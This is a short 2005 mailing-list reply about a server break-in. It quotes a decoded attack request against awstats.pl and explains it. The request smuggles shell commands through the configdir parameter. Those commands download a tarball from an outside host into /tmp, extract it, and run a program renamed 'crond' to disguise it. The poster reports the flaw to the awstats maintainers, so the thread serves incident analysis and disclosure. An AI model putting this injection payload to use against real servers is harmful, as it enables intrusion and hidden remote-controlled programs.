Security Breach
Chris Strzelczyk
cstrzelczyk at nobletechnology.net
Fri Mar 4 18:56:19 UTC 2005
>
>> Replace the url-encoded characters and you get:
>>
>> /cgi-bin/awstats.pl?configdir=|echo ;echo b_exp;cd /tmp;curl -0 wget
>> zburchi.idilis.ro/badboy.tar.gz;tar -zxvf badboy.tar.gz;cd psybnc;mv
>> mech crond;export PATH=;crond;echo e_exp;%00
>>
>> So the attacker has tricked the script into executing a set of shell
>> commands, which include changing directory to /tmp, downloading a
>> tarball from a Romanian site, extracting that tarball and then
>> executing
>> a program from the downloaded and extracted tarball, after renaming it
>> to "crond" in an effort to disguise it.
>
> Damned fine research. Good job; I'm impressed.
I have reported this to awstats. Thanks for your help everybody.
-cs
More information about the users
mailing list